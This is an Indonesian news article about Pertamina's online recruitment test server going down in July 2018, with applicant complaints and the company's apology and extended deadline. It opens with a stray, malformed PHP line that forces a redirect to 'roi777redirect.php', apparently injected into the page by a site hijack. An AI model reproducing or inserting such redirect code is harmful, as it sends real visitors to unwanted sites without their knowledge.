header( 'Location: /roi777redirect.php true, 303 );header( 'Location: roi777redirect.php', true, 303 ); Rekrutmen Pertamina, Server Down Saat Tes Online -
Rekrutmen Pertamina, Server Down Saat Tes Online

TRANSLAMPUNG.COM – Pada Selasa (10/7) PT Pertamina (Persero) mengadakan seleksi online bagi calon karyawannya. Jadwal tes yang diadakan sejak 10.00-13.00 itu menuai kendala. Banyak pihak yang mencurahkan perasaannya di twitter dengan menggunakan hastag #TesUlangPertamina.

Ide itu muncul lantaran server yang digunakan untuk melakukan Tes online Pertamina down sehingga peserta tak bisa mengakses meski sudah di reload berkali-kali. Sedihnya, ada beberapa peserta yang sudah menjalankan tes hingga soalnya selesai namun tak harus mengulang lagi dari awal gara-gara server down.

“Min @pertamina, saya sudah ngerjain pauli sampe keluar tulisan selesau kaya gini, tapi stuck disitu, pas ke home masa harus ngulang lagi??? Sedangkan waktu saya sudah habis min. #TesUlangPertamina,” cuit akun @novalrivaldi_ , Selasa (10/7).

Menanggapi hal ini, External Communication Manajer Pertamina Arya Dwi Paramita menuturkan permintaan maafnya atas gangguan teknis itu. Sebagai solusinya Pertamina menginformasikan melalui SMS kepada seluruh peserta yang lolos tes administratif untuk mengulang tes hingga pukul 24.00 WIB, Selasa (10/7).

“Kami mohon maaf atas ketidaknyamanan yang terjadi akibat gangguan teknis tersebut. Kepada semua pelamar yang lolos tahap administratif, telah kami informasikan melalui sms bahwa tes online diperpanjang hingga pukul 24.00 WIB hari ini Selasa, 10 Juli 2018,” jelasnya kepada Jawapos.com (jpg), Selasa (10/7).

Dia mengaku gangguan ini terjadi akibat tingginya akses web pada waktu yang bersamaan. Dia juga mengimbau kepada peserta yang belum mulai dan belum menyelesaikan tes online batch 1,2,3. Bisa menyelesaikannya sampai pukul 24.00 WIB.

“Silahkan log out terlebih dahulu kemudian log in kembali. Apabila ada kendala silakan hubungi Contact Pertamina 1500000,” terangnya. (uji/JPC/jpg/tnn)

News Reporter